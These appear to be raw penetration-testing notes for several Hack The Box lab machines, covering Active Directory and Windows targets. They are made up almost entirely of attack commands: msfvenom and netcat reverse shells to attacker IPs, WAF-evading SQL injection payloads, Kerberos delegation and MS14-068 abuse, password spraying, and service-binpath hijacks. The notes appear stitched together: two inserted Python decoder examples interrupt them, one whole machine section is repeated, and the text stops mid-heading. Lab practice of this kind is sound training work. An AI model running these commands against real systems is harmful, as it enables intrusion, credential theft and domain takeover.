Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
`davtest -url http://10.10.10.15` found PUT succeeds for .txt .jhtml .pl .php .html .cfm .jsp and MKCOL succeeds too, which means we can create a directory in the webroot
`msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.4 lport=9001 -f aspx -o payload.aspx`
`curl -X PUT http://10.10.10.15/payload.txt --data-binary @payload.aspx`
`curl -X MOVE -H "destination:http://10.10.10.15/payload.aspx" http://10.10.10.15/payload.txt`
`curl http://10.10.10.15/payload.aspx`
Privilege_escalation(network service->system)
we can use churrasco.exe the same way in 'Granny' machine
OR `python2 ~/tool/Windows-Exploit-Suggester-master/windows-exploit-suggester.py -i systeminfo.txt -d 2023-12-18-mssb.xls`
MS14-058 works, as 0xdf shows in his walkthrough
Initial_Foothold
gobuster dir found /documents with 2020-01-01-upload.pdf and 2020-12-15-upload.pdf
`exiftool ./*.pdf` found Creator 'William.Lee' 'Jose.Williams' save as users
`kerbrute userenum --dc 10.10.10.248 -d intelligence.htb users` both valid
Failed: `GetNPUsers.py -no-pass -dc-ip 10.10.10.248 intelligence.htb/Jose.Williams`
Failed: `GetNPUsers.py -no-pass -dc-ip 10.10.10.248 intelligence.htb/William.Lee`
`date --date='1336 day ago' +%Y-%m-%d-upload.pdf` output: 2020-01-01-upload.pdf
`for i in $(seq 1336 1701);do date --date="$i day ago" +%Y-%m-%d-upload.pdf >> pdffilenames.txt ; done`
`for i in $(cat ./pdffilenames.txt);do wget http://10.10.10.248/documents/$i;done`
`exiftool *.pdf | grep Creator | awk '{print $3}' | sort -u > usernames.txt` which has 30 usernames
`for f in *.pdf; do pdftotext $f;done`
`find . -type f -exec grep -H pass {} \; 2>/dev/null`
found default password: NewIntelligenceCorpUser9876 from 2020-06-04-upload.txt
`kerbrute_linux_amd64 userenum -d intelligence.htb --dc 10.10.10.248 usernames.txt` all valid
`kerbrute_linux_amd64 passwordspray usernames.txt NewIntelligenceCorpUser9876 -d intelligence.htb --dc 10.10.10.248`
`crackmapexec smb 10.10.10.248 -u users -p NewIntelligenceCorpUser9876 --continue-on-success` found Tiffany.Molina:NewIntelligenceCorpUser9876
`smbmap -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -H 10.10.10.248` readable shares: IPC$,IT,NETLOGON,SYSVOL,Users
smb: \Tiffany.Molina\desktop\> get user.txt
Privilege_escalation
`bloodhound-python -c ALL -u Tiffany.Molina -p NewIntelligenceCorpUser9876 -d intelligence.htb -dc intelligence.htb -ns 10.10.10.248`
Nothing interesting in bloodhound now
//10.10.10.248/IT found downdetector.ps1
The script goes into LDAP and gets a list of all the computers, and then loops over the ones where the name starts with "web". It will try to issue a web request to that server (with the running user's credentials), and if the status code isn't 200, it will email Ted.Graves and let them know that the host is down. The comment at the top says it is scheduled to run every five minutes.
we can use dnstool.py from https://github.com/dirkjanm/krbrelayx to add a new DNS record that points to us
`python3 dnstool.py -u intelligence\\Tiffany.Molina -p NewIntelligenceCorpUser9876 --action add --record web-test --data 10.10.14.19 --type A intelligence.htb`
and use Responder to catch the hash
`responder -I tun0` [HTTP] NTLMv2 Hash : Ted.Graves::intelligence:417b3c7a8c22d... (hash truncated)
`john ntlm2.txt --wordlist=/usr/share/wordlists/rockyou.txt` got cred Ted.Graves:Mr.Teddy
`bloodhound-python -c ALL -u Ted.Graves -p Mr.Teddy -d intelligence.htb -dc intelligence.htb -ns 10.10.10.248`
user 'Ted.Graves' is in 'ITSupport' group which has 'ReadGMSAPassword' on user 'SVC_INT' which has 'AllowedToDelegate' on the Domain_Controller
`gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb -l 10.10.10.248` got hash svc_int$:::87c12d4a0641b2b17fb5620cc2db2ca8
`ntpdate -s 10.10.10.248` the VM time will reset after 30s unless we stop the guest utils: `service virtualbox-guest-utils stop`
Bloodhound>>svc_int>>Node_Info>>Node_Properties>>AllowedToDelegate: WWW/dc.intelligence.htb
`getST.py -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes :87c12d4a0641b2b17fb5620cc2db2ca8`
`export KRB5CCNAME=Administrator.ccache`
`psexec.py -no-pass -k dc.intelligence.htb` 'system_shell'
OR `KRB5CCNAME=administrator.ccache wmiexec.py -k -no-pass administrator@dc.intelligence.htb` 'administrator_shell'
Initial_Foothold
tcp8080: default Tomcat page; log in to the manager with the default cred tomcat:s3cret
I use `msfvenom -p java/shell_reverse_tcp lhost=10.10.14.3 lport=9001 -f war -o pwn.war`
upload it, click it, and the listener got a system shell
0xdf use `msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.83 LPORT=9002 -f war > rev_shell-9002.war`
`jar -ft rev_shell-9002.war` shows 'ppaejmsg.jsp'
trigger manually with `curl http://10.10.10.95:8080/rev_shell-9002/ppaejmsg.jsp`
Initial_Foothold
`nmap --script=smb-vuln* 10.10.10.4` found MS17-010 and MS-08-067(0xdf did)
`msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.11 lport=9001 -f exe -o 9001.exe`
`python2 ~/tool/windows-kernel-exploits-master/MS17-010/MS17-010_CVE-2017-0143-main/checker.py 10.10.10.4`
the output tests some pipe names: spoolss: Ok (32 bit) browser: Ok (32 bit)
`python2 ~/tool/windows-kernel-exploits-master/MS17-010/MS17-010_CVE-2017-0143-main/send_and_execute.py 10.10.10.4 9001.exe 445 browser`
and listener got a shell which can read both flags
Note: this machine does not have whoami.exe, so I ended up uploading one and found it is a system shell
Initial_Foothold
The TLS certificate shows user roy and domain love.htb, staging.love.htb
http://staging.love.htb click 'demo' leads to /beta.php, a URL file scanner that can be abused for SSRF (Server-Side Request Forgery)
SSRF to http://127.0.0.1:5000/ outputs the 'Voting System' cred admin:@LoveIsInTheAir!!!!
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution) https://www.exploit-db.com/exploits/49445
edit the script; note that the 4 URLs need the '/votesystem' part removed
`python3 49445_edited.py`
manually: update admin profile photo with cmd.php, and trigger with /images/cmd.php
Privilege_escalation(phoebe-system)
winpeas.exe found 'AlwaysInstallElevated set to 1 in HKCU and HKLM' which means a user of any privilege can install .msi files as NT AUTHORITY\SYSTEM
manually confirm: `reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`
manually confirm: `reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated`
According to Tib3rius, both registry values need to be enabled (set to 1) for the priv_esc to work
`msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.14.11 lport=9001 -f msi -o 9001.msi`
upload and `msiexec /quiet /qn /i 9001.msi`
`msiexec /?` pops up a GUI manual; I'll save the flag notes here
'/quiet' Quiet mode, no user interaction, '/qn' No UI, '/i' Installs or configures a product
`kerbrute_linux_amd64 userenum --domain htb.local --dc 10.10.10.52 --threads 50 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt` found username 'james' 'mantis'
Failed: `GetNPUsers.py 'htb.local/' -usersfile ./users.txt -format hashcat -outputfile hashes.asreproast -dc-ip 10.10.10.52`
gobuster dir http port 1337 found /secure_notes which leak /secure_notes/dev_notes_NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx.txt.txt which has 'OrchardCMS admin creadentials 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001'
decoded by CyberChef's 'Magic' operation (it is 8-bit binary-encoded ASCII, not encryption) got admin:@dm!n_P@ssW0rd!
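Both strings above are layered encodings rather than encryption: the filename suffix is base64 of a hex string of ASCII, and the note body is ASCII written out as 8-bit binary. The following is an added example (not code from the page, from CyberChef, or from the machine author) that peels such layers the way the 'Magic' operation does, trying the most restrictive decoder first so a binary string is not mistaken for hex or base64; the two token constants are copied from the page, and the decoder order and depth limit are this example's own assumptions.

```python
import base64
import re

# Constructed sample inputs: the suffix of the dev_notes filename and the
# "credentials" string quoted in the note, both copied from the page above.
FILENAME_TOKEN = "NmQyNDI0NzE2YzVmNTM0MDVmNTA0MDczNzM1NzMwNzI2NDIx"
BINARY_TOKEN = (
    "01000000011001000110110100100001011011100101111101010000"
    "0100000001110011011100110101011100110000011100100110010000100001"
)


def from_binary(text: str) -> str:
    """Groups of eight '0'/'1' characters, each one ASCII byte."""
    bits = re.sub(r"\s+", "", text)
    if not bits or len(bits) % 8 or not re.fullmatch(r"[01]+", bits):
        raise ValueError("not a byte-aligned binary string")
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8)).decode("ascii")


def from_hex(text: str) -> str:
    """Even-length run of hex digits -> ASCII."""
    if not text or len(text) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", text):
        raise ValueError("not a hex string")
    return bytes.fromhex(text).decode("ascii")


def from_base64(text: str) -> str:
    """Strict base64 (alphabet and padding checked) -> ASCII."""
    if not text or len(text) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", text):
        raise ValueError("not a base64 string")
    return base64.b64decode(text, validate=True).decode("ascii")


# Order matters: a 120-bit binary string is also even-length hex and
# length-divisible-by-4 base64, so the most restrictive decoder goes first.
DECODERS = [("binary", from_binary), ("hex", from_hex), ("base64", from_base64)]


def peel(text: str, max_depth: int = 5) -> list[tuple[str, str]]:
    """Mimic CyberChef's Magic: repeatedly apply the first decoder whose output
    is printable ASCII, recording (layer, result) until no decoder applies."""
    steps = []
    current = text.strip()
    for _ in range(max_depth):
        for name, fn in DECODERS:
            try:
                out = fn(current)
            except ValueError:  # also covers binascii.Error and UnicodeDecodeError
                continue
            if out and out.isprintable():
                steps.append((name, out))
                current = out
                break
        else:
            break  # nothing applied: current is the plaintext
    return steps


if __name__ == "__main__":
    for token in (FILENAME_TOKEN, BINARY_TOKEN):
        for layer, value in peel(token):
            print(f"{layer:>7}: {value}")
```

Run stand-alone it prints the base64 and hex layers of the filename token and the single binary layer of the note body. The printable-ASCII check is what stops the loop on the real plaintext: neither of the recovered credentials matches any decoder's alphabet, so no further layer is attempted.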
`mssqlclient.py 'admin:m$$ql_S@_P@ssW0rd!@10.10.10.52'` OR `sqsh -S 10.10.10.52 -U admin -P 'm$$ql_S@_P@ssW0rd!'`
`SELECT * FROM orcharddb.INFORMATION_SCHEMA.COLUMNS;`
`USE orcharddb; SELECT * FROM blog_Orchard_Users_UserPartRecord;` found james:J@m3s_P@ssW0rd!
no shell for james, so the next step won't be called priv_esc
ippsec and 0xdf both find MS14-068 with "lots of research"
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek ippsec's HTB official PDF
`rpcclient -U htb.local/james 10.10.10.52` enter password and `lookupnames james` got james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)
`python ~/tool/windows-kernel-exploits-master/MS14-068/pykek/ms14-068.py -u james@htb.local -d mantis.htb.local -p J@m3s_P@ssW0rd! -s S-1-5-21-4220043660-4019079961-2895681657` output silver ticket TGT_james@htb.local.ccache
`cp TGT_james@htb.local.ccache /tmp/krb5cc_0`
`goldenPac.py htb.local/james@mantis.htb.local`
got a system shell. 0xdf's walkthrough:
`apt-get install krb5-user cifs-utils`
/etc/hosts: 10.10.10.52 mantis.htb.local mantis
/etc/resolv.conf: nameserver 10.10.10.52
/etc/krb5.conf:
[libdefaults]
default_realm = HTB.LOCAL
[realms]
htb.local = {
kdc = mantis.htb.local:88
admin_server = mantis.htb.local
default_domain = htb.local
}
[domain_realm]
.domain.internal = htb.local
domain.internal = htb.local
`ntpdate 10.10.10.52`
`kinit james` enter password
`klist` verify ticket
`rpcclient -U htb.local/james 10.10.10.52` enter password and `lookupnames james` got james S-1-5-21-4220043660-4019079961-2895681657-1103 (User: 1)
`python /opt/pykek/ms14-068.py -u james@htb.local -s S-1-5-21-4220043660-4019079961-2895681657-1103 -d mantis.htb.local` enter password
`cp TGT_james@htb.local.ccache /tmp/krb5cc_0`
`smbclient -W htb.local //mantis/c$ -k` this smb session can get both flags
`goldenPac.py 'htb.local/james:J@m3s_P@ssW0rd!@mantis'`
Initial_Foothold
`curl -X POST http://10.10.10.179/api/getColleagues -H 'Content-Type: application/json' -d '{"name":""}'` save usernames
save the Burp request to a file and run sqlmap through the Burp proxy for inspection
`sqlmap -r colleagues.request --tamper=charunicodeescape --delay 5 --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 --dump-all --exclude-sysdbs`
The charunicodeescape tamper plugin will unicode encode all the characters in the payload. This will avoid the WAF checking for bad characters.
manual SQL injection with UTF-16 escape format: e.g. ' encoded to \u0027
test' OR 1=1 -- -
encoded: \u0074\u0065\u0073\u0074\u0027\u0020\u004f\u0052\u0020\u0031\u003d\u0031\u0020\u002d\u002d\u0020\u002d
' order by 5-- -
output: normal all users
' order by 6-- -
output: 'null' which means 5 columns
test' UNION SELECT 1,@@VERSION,DB_NAME(),4,5-- -
output: MSSQL Server 2017 14.0.1000.169 (x64) on Windows Server 2016 Strandard 10.0 x64
test' UNION SELECT 1,table_name,3,4,5 FROM INFORMATION_SCHEMA.TABLES-- -
output: Colleagues, Logins
test' UNION SELECT 1,name,3,4,5 FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name = 'Logins')-- -
output: id, password, username
test' UNION SELECT 1,username,password,4,5 FROM Logins-- -
output: some hashes, cracked (password1 finance1 banking1); verified with crackmapexec smb/winrm, none work
test' UNION SELECT 1,2,3,4,SUSER_SID('MegaCorp\Administrator')-- -
output: some string not readable
ippsec uses a script to dump the full RID automatically after finding its length
test' UNION SELECT 1,2,3,4,DATALENGTH(SUSER_SID('MegaCorp\Administrator'))-- -
output: 28
0xdf uses master.dbo.fn_varbintohexstr to get the RID
test' UNION ALL SELECT 58,58,58,master.dbo.fn_varbintohexstr(SUSER_SID('MEGACORP\Domain Admins')),58-- gxQm
output: 0x0105000000000005150000001c00d1bcd181f1492bdfc23600020000
Verify using SUSER_SNAME
test' UNION ALL SELECT 58,58,58,SUSER_SNAME(0x0105000000000005150000001c00d1bcd181f1492bdfc236f4010000),58-- gxQm
Next, both ippsec and 0xdf use a script to brute-force SIDs to find domain users
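The 28 bytes reported by DATALENGTH and the hex blob from fn_varbintohexstr are a binary SID: a 1-byte revision, a 1-byte sub-authority count, a 6-byte big-endian identifier authority, then one little-endian 32-bit sub-authority per count, the last of which is the RID. The following is an added example (not code from the page, ippsec, or 0xdf) that parses those blobs into the familiar S-1-5-21-... form, the same decoding a defender needs when SIDs turn up raw in event logs or database output; the two blob constants are copied from the queries above, and the well-known RID table is a short subset this example assumes.

```python
import struct

# Constructed sample inputs: the two binary SIDs from the fn_varbintohexstr
# and SUSER_SNAME queries above.
DOMAIN_ADMINS_BLOB = "0x0105000000000005150000001c00d1bcd181f1492bdfc23600020000"
ADMINISTRATOR_BLOB = "0x0105000000000005150000001c00d1bcd181f1492bdfc236f4010000"

# Short subset of well-known domain RIDs (assumed here for labelling only).
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt",
                   512: "Domain Admins", 513: "Domain Users", 519: "Enterprise Admins"}


def sid_length(subauthority_count: int) -> int:
    """Bytes in a binary SID with N sub-authorities: 1 + 1 + 6 + 4*N.
    Five sub-authorities (S-1-5-21-a-b-c-RID) give the 28 seen via DATALENGTH."""
    return 8 + 4 * subauthority_count


def parse_sid(blob: str) -> str:
    """Convert a binary SID given as 0x-prefixed hex into its S-1-... string.

    Layout: revision (1) | sub-authority count (1) |
            identifier authority (6, big-endian) |
            sub-authorities (4 each, little-endian); the last one is the RID.
    """
    hex_text = blob[2:] if blob.lower().startswith("0x") else blob
    raw = bytes.fromhex(hex_text)
    if len(raw) < 8:
        raise ValueError("SID shorter than its fixed 8-byte header")
    revision, count = raw[0], raw[1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    if len(raw) != sid_length(count):
        raise ValueError(f"length {len(raw)} does not match {count} sub-authorities")
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack_from(f"<{count}I", raw, 8)
    return "S-{}-{}-{}".format(revision, authority, "-".join(map(str, subs)))


def split_sid(sid: str) -> tuple[str, int]:
    """Split 'S-1-5-21-a-b-c-RID' into (domain SID, RID)."""
    domain, _, rid = sid.rpartition("-")
    return domain, int(rid)


def describe(blob: str) -> str:
    """Human-readable summary: full SID, domain part, and well-known RID name."""
    sid = parse_sid(blob)
    domain, rid = split_sid(sid)
    return f"{sid}  domain={domain}  rid={rid} ({WELL_KNOWN_RIDS.get(rid, 'custom')})"


if __name__ == "__main__":
    for blob in (DOMAIN_ADMINS_BLOB, ADMINISTRATOR_BLOB):
        print(describe(blob))
```

The two blobs differ only in their last four bytes (00020000 versus f4010000), which decode to RIDs 512 and 500, so they are 'Domain Admins' and 'Administrator' of the same domain; the length check is what would catch a truncated blob such as one read through a column narrower than 28 bytes.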
`crackmapexec smb 10.10.10.179 -u dom_users -p passwords --continue-on-success` found tushikikatomo:finance1
`evil-winrm -u "MEGACORP\tushikikatomo" -p finance1 -i 10.10.10.179`
Privilege_escalation(tushikikatomo–>cyork)
https://github.com/taviso/cefdebug
*Evil-WinRM* PS C:\programdata> .\cefdebug.exe
some TCP socket links are shown, e.g.: ws://127.0.0.1:9102/1243eb8e-cffa-4cae-b922-5fa98b74e779
*Evil-WinRM* PS C:\programdata> .\cefdebug.exe --code "process.version" --url ws://127.0.0.1:14393/5a73a31b-903d-41e8-b18d-9fb422e89234
*Evil-WinRM* PS C:\programdata> .\cefdebug --code "process.mainModule.require('child_process').exec('whoami > C:\windows\system32\spool\drivers\color\0xdf')" --url ws://127.0.0.1:64493/fd4b0ffa-a388-40da-b01a-62709102094b
*Evil-WinRM* PS C:\programdata> type C:\windows\system32\spool\drivers\color\0xdf
output: megacorp\cyork
*Evil-WinRM* PS C:\programdata> .\cefdebug --code "process.mainModule.require('child_process').exec('C:\\programdata\\nc.exe 10.10.14.19 443 -e cmd')" --url ws://127.0.0.1:60404/830991c3-0f17-4025-9b2c-a0ef1c8675f2
Privilege_escalation(cyork–>sbauer)
download C:\inetpub\wwwroot\bin\MultimasterAPI.dll
`strings -el MultimasterAPI.dll > MultimasterAPI.dll.strings.txt`
-e --encoding={s,S,b,l,B,L} Select character size and endianness: s = 7-bit, S = 8-bit, {b,l} = 16-bit, {B,L} = 32-bit
`grep -i pass MultimasterAPI.dll.strings.txt` server=localhost;database=Hub_DB;uid=finder;password=D3veL0pM3nT!;
OR use dnSpy.exe on the Commando VM to analyze MultimasterAPI.dll and find the cred in the source code
`crackmapexec smb 10.10.10.179 -u users.txt -p 'D3veL0pM3nT!' --continue-on-success` found sbauer:D3veL0pM3nT!
`crackmapexec winrm 10.10.10.179 -u sbauer -p 'D3veL0pM3nT!'`
`evil-winrm -u 'MEGACORP\sbauer' -p 'D3veL0pM3nT!' -i 10.10.10.179`
Privilege_escalation(sbauer–>jorden)
*Evil-WinRM* PS C:\programdata> .\SharpHound.exe -c all
OR `bloodhound-python -u 'sbauer' -p 'D3veL0pM3nT!' -ns 10.10.10.179 -d MEGACORP.LOCAL -c all --zip`
In BloodHound, search the 3 users we own, right-click >> Mark as Owned, then run the query 'Shortest Paths to High Value Targets'
user 'sbauer' has 'GenericWrite' on user 'jorden'
*Evil-WinRM* PS C:\programdata> copy \\10.10.14.19\share\PowerView.ps1 .
*Evil-WinRM* PS C:\programdata> menu
*Evil-WinRM* PS C:\programdata> Bypass-4MSI
*Evil-WinRM* PS C:\programdata> Import-Module .\PowerView.ps1
0xdf uses: Set-DomainObject -Identity jorden -XOR @{useraccountcontrol=4194304} -Verbose
and verify with `Get-DomainUser jorden | ConvertFrom-UACValue`
`GetNPUsers.py -no-pass -dc-ip 10.10.10.179 MEGACORP/jorden`
ippsec uses: Get-ADUser -Filter 'Name -like "Jor*"' | Set-ADAccountControl -doesnotrequirepreauth $true
`GetNPUsers.py MEGACORP.local/jorden -request`
`hashcat jorden.hash --wordlist /usr/share/wordlists/rockyou.txt` got jorden:rainforest786
`evil-winrm -u 'jorden' -p 'rainforest786' -i 10.10.10.179`
Privilege_escalation(jorden->system)
`net user jorden` shows 'Server Operators' group membership
https://ss64.com/nt/syntax-security_groups.html says this group can start/stop services
According to ippsec pdf, the group can also change the properties of the 'browser' service and other services
ippsec_payload: change administrator pass
`sc.exe config browser binpath= "C:\Windows\System32\cmd.exe /c net user administrator D4aUss834cWad"` (sc.exe needs the space after `binpath=`)
`sc.exe qc browser` verify the config
`sc.exe stop browser` `sc.exe start browser`
`psexec.py administrator@10.10.10.179`
0xdf_payload: nc reverse shell
`sc.exe config browser binPath= "C:\programdata\nc64.exe -e cmd.exe 10.10.14.19 443"`
`sc.exe qc browser` verify the config
`sc.exe stop browser` `sc.exe start browser`
`rlwrap nc -lnvp 443` got system shell
`curl -X POST http://10.10.10.179/api/getColleagues -H 'Content-Type: application/json' -d '{"name":""}'` save usernames
save burp request to a file and sqlmap with burp inspection
`sqlmap -r colleagues.request --tamper=charunicodeescape --delay 5 --level 5 --risk 3 --batch --proxy http://127.0.0.1:8080 --dump-all --exclude-sysdbs`
The charunicodeescape tamper plugin will unicode encode all the characters in the payload. This will avoid the WAF checking for bad characters.
manual SQL Injection with UTF-16 format: eg. ' encoded_to \u0027
test' OR 1=1 -- -
encoded: \u0074\u0065\u0073\u0074\u0027\u0020\u004f\u0052\u0020\u0031\u003d\u0031\u0020\u002d\u002d\u0020\u002d
' order by 5-- -
output: normal all users
' order by 6-- -
output: 'null' which means 5 columns
test' UNION SELECT 1,@@VERSION,DB_NAME(),4,5-- -
output: MSSQL Server 2017 14.0.1000.169 (x64) on Windows Server 2016 Strandard 10.0 x64
test' UNION SELECT 1,table_name,3,4,5 FROM INFORMATION_SCHEMA.TABLES-- -
output: Colleagues, Logins
test' UNION SELECT 1,name,3,4,5 FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name = 'Logins')-- -
output: id, password, username
test' UNION SELECT 1,username,oasswird,4,5 FROM Logins-- -
output: some hashes, cracked (password1 finance1 banking1) verify with crackmapexec smb/winrm, none works
test' UNION SELECT 1,2,3,4,SUSER_SID('MegaCorp\Administrator')-- -
output: some string not readable
ippsec use script to auto run out the full RID after find its length
test' UNION SELECT 1,2,3,4,DATALENGTH(SUSER_SID('MegaCorp\Administrator'))-- -
output: 28
0xdf use master.dbo.fn_varbintohexstr module to get the RID
test' UNION ALL SELECT 58,58,58,master.dbo.fn_varbintohexstr(SUSER_SID('MEGACORP\Domain Admins')),58-- gxQm
output: 0x0105000000000005150000001c00d1bcd181f1492bdfc23600020000
Verify using SUSER_SNAME
test' UNION ALL SELECT 58,58,58,SUSER_SNAME(0x0105000000000005150000001c00d1bcd181f1492bdfc236f4010000),58-- gxQm
Next, both ippsec and 0xdf use script to bruteforce SID to find domain users
`crackmapexec smb 10.10.10.179 -u dom_users -p passwords --continue-on-success` found tushikikatomo:finance1
`evil-winrm -u "MEGACORP\tushikikatomo" -p finance1 -i 10.10.10.179`
Privilege_escalation(tushikikatomo–>cyork)
https://github.com/taviso/cefdebug
*Evil-WinRM* PS C:\programdata> .\cefdebug.exe
some TCP socket links are shown, e.g.: ws://127.0.0.1:9102/1243eb8e-cffa-4cae-b922-5fa98b74e779
*Evil-WinRM* PS C:\programdata> .\cefdebug.exe --code "process.version" --url ws://127.0.0.1:14393/5a73a31b-903d-41e8-b18d-9fb422e89234
*Evil-WinRM* PS C:\programdata> .\cefdebug --code "process.mainModule.require('child_process').exec('whoami > C:\windows\system32\spool\drivers\color\0xdf')" --url ws://127.0.0.1:64493/fd4b0ffa-a388-40da-b01a-62709102094b
*Evil-WinRM* PS C:\programdata> type C:\windows\system32\spool\drivers\color\0xdf
output: megacorp\cyork
*Evil-WinRM* PS C:\programdata> .\cefdebug --code "process.mainModule.require('child_process').exec('C:\\programdata\\nc.exe 10.10.14.19 443 -e cmd')" --url ws://127.0.0.1:60404/830991c3-0f17-4025-9b2c-a0ef1c8675f2
Privilege_escalation(cyork–>sbauer)
download C:\inetpub\wwwroot\bin\MultimasterAPI.dll
`strings -el MultimasterAPI.dll > MultimasterAPI.dll.strings.txt`
-e --encoding={s,S,b,l,B,L} Select character size and endianness: s = 7-bit, S = 8-bit, {b,l} = 16-bit, {B,L} = 32-bit
`grep -i pass MultimasterAPI.dll.strings.txt` server=localhost;database=Hub_DB;uid=finder;password=D3veL0pM3nT!;
OR use dnSpy.exe on the Commando VM to analyze MultimasterAPI.dll and find the cred in the source code
`crackmapexec smb 10.10.10.179 -u users.txt -p 'D3veL0pM3nT!' --continue-on-success` found sbauer:D3veL0pM3nT!
`crackmapexec winrm 10.10.10.179 -u sbauer -p 'D3veL0pM3nT!'`
`evil-winrm -u 'MEGACORP\sbauer' -p 'D3veL0pM3nT!' -i 10.10.10.179`
Privilege_escalation(sbauer–>jorden)
*Evil-WinRM* PS C:\programdata> .\SharpHound.exe -c all
OR `bloodhound-python -u 'sbauer' -p 'D3veL0pM3nT!' -ns 10.10.10.179 -d MEGACORP.LOCAL -c all --zip`
In bloodhound, search the 3 users we owned and right_click>>owned then query 'Shortest Paths to High Value Targets'
user 'sbauer' has 'GenericWrite' on user 'jorden'
*Evil-WinRM* PS C:\programdata> copy \\10.10.14.19\share\PowerView.ps1 .
*Evil-WinRM* PS C:\programdata> menu
*Evil-WinRM* PS C:\programdata> Bypass-4MSI
*Evil-WinRM* PS C:\programdata> Import-Module .\PowerView.ps1
0xdf uses: Set-DomainObject -Identity jorden -XOR @{useraccountcontrol=4194304} -Verbose
and verify with `Get-DomainUser jorden | ConvertFrom-UACValue`
`GetNPUsers.py -no-pass -dc-ip 10.10.10.179 MEGACORP/jorden`
ippsec uses: Get-ADUser -Filter 'Name -like "Jor*"' | Set-ADAccountControl -doesnotrequirepreauth $true
`GetNPUsers.py MEGACORP.local/jorden -request`
`hashcat jorden.hash --wordlist /usr/share/wordlists/rockyou.txt` got jorden:rainforest786
`evil-winrm -u 'jorden' -p 'rainforest786' -i 10.10.10.179`
Privilege_escalation(jorden->system)
`net user jorden` shows 'Server Operators' group membership
https://ss64.com/nt/syntax-security_groups.html says this group can start/stop services
According to ippsec pdf, the group can also change the properties of the 'browser' service and other services
ippsec_payload: change administrator pass
`sc.exe config browser binpath= "C:\Windows\System32\cmd.exe /c net user administrator D4aUss834cWad"`
`sc.exe qc browser` verify the config
`sc.exe stop browser` `sc.exe start browser`
`psexec.py administrator@10.10.10.179`
0xdf_payload: nc reverse shell
`sc.exe config browser binPath= "C:\programdata\nc64.exe -e cmd.exe 10.10.14.19 443"`
`sc.exe qc browser` verify the config
`sc.exe stop browser` `sc.exe start browser`
`rlwrap nc -lnvp 443` got system shell
Initial_Foothold
ftp anonymous login, \ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.old.bak found cred prtgadmin:PrTg@dmin2018
but the cred doesn't work on HTTP - PRTG Network Monitor
prtgadmin:PrTg@dmin2019 works
admin_page>>account_settings>>notifications
check 'Execute Program'; the injection is in the Parameter field
0xdf: test.txt;net user anon p3nT3st! /add;net localgroup administrators anon /add
ippsec: test | ping -n 5 10.10.14.10
I use: test | powershell -e ...........
listener got system shell
PRTG Network Monitor 18.2.38 - (Authenticated) Remote Code Execution https://www.exploit-db.com/exploits/46527
I haven't tried this 46527.sh yet.
Initial_Foothold
tcp8080 Jenkins: create an account, log in, create a job, 'add build step' 'Execute Windows batch command'
'build triggers' select 'build periodically' and fill with '* * * * *' which runs every minute
but the reverse shell failed; it seems there is a firewall rule
`powershell -c Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block` which shows a rule blocking all outbound traffic
`powershell -c Get-NetFirewallRule -Direction Outbound -Enabled True -Action Allow` which shows ICMP outbound is allowed
tcpdump received the ping; in Jenkins there is a dropdown on the build that leads to the console output
`powershell -c ls ..\..\users\` shows the folder for web_admin C:\Users\oliver\AppData\Local\Jenkins\.jenkins\users\admin_17207690984073220035 with config.xml in it
https://github.com/hoto/jenkins-credentials-decryptor which needs -m master.key -s hudson.util.Secret -c credentials.xml
`powershell -c cat C:\Users\oliver\AppData\Local\Jenkins\.jenkins\users\admin_17207690984073220035\config.xml`
`powershell -c cat C:\Users\oliver\AppData\Local\Jenkins\.jenkins\secrets\master.key`
`powershell -c [convert]::ToBase64String((cat C:\Users\oliver\AppData\Local\Jenkins\.jenkins\secrets\hudson.util.Secret -Encoding byte))`
decrypt on kali `jenkins-credentials-decryptor -m master.key -s hudson.util.Secret -c config.xml` got oliver:c1cdfun_d2434
0xdf notes this one works as well: `wget https://raw.githubusercontent.com/gquere/pwn_jenkins/master/offline_decryption/jenkins_offline_decrypt.py`
`evil-winrm -i 10.10.11.132 -u oliver -p c1cdfun_d2434`
Privilege_escalation(oliver->smith)
*Evil-WinRM* PS C:\programdata> upload SharpHound.ps1
*Evil-WinRM* PS C:\programdata> . .\SharpHound.ps1
*Evil-WinRM* PS C:\programdata> Invoke-BloodHound -CollectionMethod All
bloodhound “Outbound Control Rights” which shows 'oliver' has 'ForceChangePassword' over 'smith'
'smith' has 'GenericWrite' over 'maria', and 'maria' has 'WriteOwner' over 'Domain Admins'
*Evil-WinRM* PS C:\programdata> upload PowerView.ps1
*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1
*Evil-WinRM* PS C:\programdata> $newpass = ConvertTo-SecureString '0xdf0xdf!' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity smith -AccountPassword $newpass
`evil-winrm -i 10.10.11.132 -u smith -p '0xdf0xdf!'`
Privilege_escalation(smith->maria)
